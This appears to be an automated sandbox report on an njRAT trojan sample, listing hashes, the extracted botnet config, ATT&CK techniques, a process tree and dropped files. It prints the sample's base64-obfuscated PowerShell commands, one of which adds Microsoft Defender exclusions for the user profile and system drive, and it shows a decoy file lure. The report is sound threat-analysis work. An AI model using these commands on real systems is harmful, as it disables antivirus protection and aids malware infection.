njrat | ed307213c0e62af8477e9ca939b045da7498c21d7c717011a78b3b2de8dfec3a

General

Target

filetest.exe
Size

33KB
MD5

ef59fb3c39255044648423954f1da668
SHA1

45cf2370789c5314fa2c57221ca02b6ef877be60
SHA256

ed307213c0e62af8477e9ca939b045da7498c21d7c717011a78b3b2de8dfec3a
SHA512

907aefa515e7df8dd215f57ec47d96e79cf5b63b0a4e7aeb81ed8ce2540796dd4281ce46d3b06b4bda4c250aec6bd62b83b5018979cea064fa7f37fd7e55f101
SSDEEP

768:uR5KrKvDIAuBtvoY2vIP0S9QY3UuTWUSX94HPy8R9:rKvMnf2Ie+U1NX94vy8/

Score

10^/10

njrat hacked defense_evasion discovery trojan

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

Mutex

ee714fb89d1a0ba22c66b8980599112e

Attributes

reg_key
ee714fb89d1a0ba22c66b8980599112e
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Executes dropped EXE 1 IoCs

pid	Process
2904	Server.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_Classes\Local Settings	rundll32.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2904	Server.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2236	powershell.exe
2952	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3032	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3032	AcroRd32.exe
3032	AcroRd32.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 2236	2520	filetest.exe	30
PID 2520 wrote to memory of 2236	2520	filetest.exe	30
PID 2520 wrote to memory of 2236	2520	filetest.exe	30
PID 2520 wrote to memory of 2952	2520	filetest.exe	33
PID 2520 wrote to memory of 2952	2520	filetest.exe	33
PID 2520 wrote to memory of 2952	2520	filetest.exe	33
PID 2520 wrote to memory of 2904	2520	filetest.exe	35
PID 2520 wrote to memory of 2904	2520	filetest.exe	35
PID 2520 wrote to memory of 2904	2520	filetest.exe	35
PID 2904 wrote to memory of 2364	2904	Server.exe	36
PID 2904 wrote to memory of 2364	2904	Server.exe	36
PID 2904 wrote to memory of 2364	2904	Server.exe	36
PID 2364 wrote to memory of 3032	2364	rundll32.exe	37
PID 2364 wrote to memory of 3032	2364	rundll32.exe	37
PID 2364 wrote to memory of 3032	2364	rundll32.exe	37
PID 2364 wrote to memory of 3032	2364	rundll32.exe	37

C:\Users\Admin\AppData\Local\Temp\filetest.exe
"C:\Users\Admin\AppData\Local\Temp\filetest.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZwBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZgB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABvAHcAbgBsAG8AYQBkACAARQByAHIAbwByACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHkAawBnACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAegBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAagB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdABkACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2952
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of WriteProcessMemory
  PID:2904
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\nudes
    3⤵
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\nudes"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:3032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Server.exe

Filesize
24KB

MD5
fa9439d61c3c28bb92a75095cf39d6bc

SHA1
a959b37a215b1417e72fb7df722e9cecd8f29629

SHA256
5f135cd0ac161e5ec8e90598e5ad2f1db3981a597a3c0f1cbd4aac54189c62a8

SHA512
49703b19e66daa3932dc7074b99ef6859005b45f99b7cd84d3681291cf006b4526ca7561bbfeb6c1527fa7ab57d9164eaaf331af3308416b23ac6e5cc59c7fa2

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
53593a7d36462d7f4ac82617786e464d

SHA1
782f644d2af4080b7afe9309c23c764ea32b5fd9

SHA256
c60e22047fd7c6b885a8f90990efd72f82bb5860ee53d46e982806854f7e8db4

SHA512
7d447dc67c290e7667bc6bac9559c9212185c4117e8539737f667f6d95f41b3ed999e2779289cc1163e2bc600371a5d4be3368a09ee3c2c8593af8a70cc5b6f8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
77467a5990550fc46995aaac4e361b8c

SHA1
5ec6066437641c49c74ed1fcf617d7396c2658a4

SHA256
9f2cdcc7aa85bb6209751c810b72f006ec74b9e22bac8f6c90b311483fdb299f

SHA512
cd9d90a97c3df8759e8a20d370b0ea91575961928741e327c4218e9a5d71516c76517d9e19a489de54281d46e080d93b8527abe2215e59d7ea18830cd10577f6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TW6BBWYVVWVEQU7L1D0B.temp

Filesize
7KB

MD5
763986d7c34b0b12685664ac8ee4f4cf

SHA1
bb33f72e56f6d14beb1e5a2568e4e2df77db7f83

SHA256
6d9c340e50e58b99a04e99336b88db624cb09db0664c83b05c1f843ec5fcca7e

SHA512
f1cfe1b21af1d4d12b2783d200a7eaf5d37b8d8c46284a78b7831d7ca39a9e2d507d2b95caec6b619e6b6b1e0e371ab8676fe4c7b4843b005286c183202438cb

Download Submit
memory/2236-7-0x0000000002C50000-0x0000000002CD0000-memory.dmp

Filesize
512KB

Download
memory/2236-9-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2236-8-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2520-11-0x000007FEF66B0000-0x000007FEF709C000-memory.dmp

Filesize
9.9MB

Download
memory/2520-0-0x000007FEF66B3000-0x000007FEF66B4000-memory.dmp

Filesize
4KB

Download
memory/2520-10-0x000007FEF66B3000-0x000007FEF66B4000-memory.dmp

Filesize
4KB

Download
memory/2520-2-0x000007FEF66B0000-0x000007FEF709C000-memory.dmp

Filesize
9.9MB

Download
memory/2520-28-0x000007FEF66B0000-0x000007FEF709C000-memory.dmp

Filesize
9.9MB

Download
memory/2520-1-0x0000000001330000-0x000000000133E000-memory.dmp

Filesize
56KB

Download
memory/2904-21-0x0000000001210000-0x000000000121C000-memory.dmp

Filesize
48KB

Download
memory/2952-26-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/2952-27-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing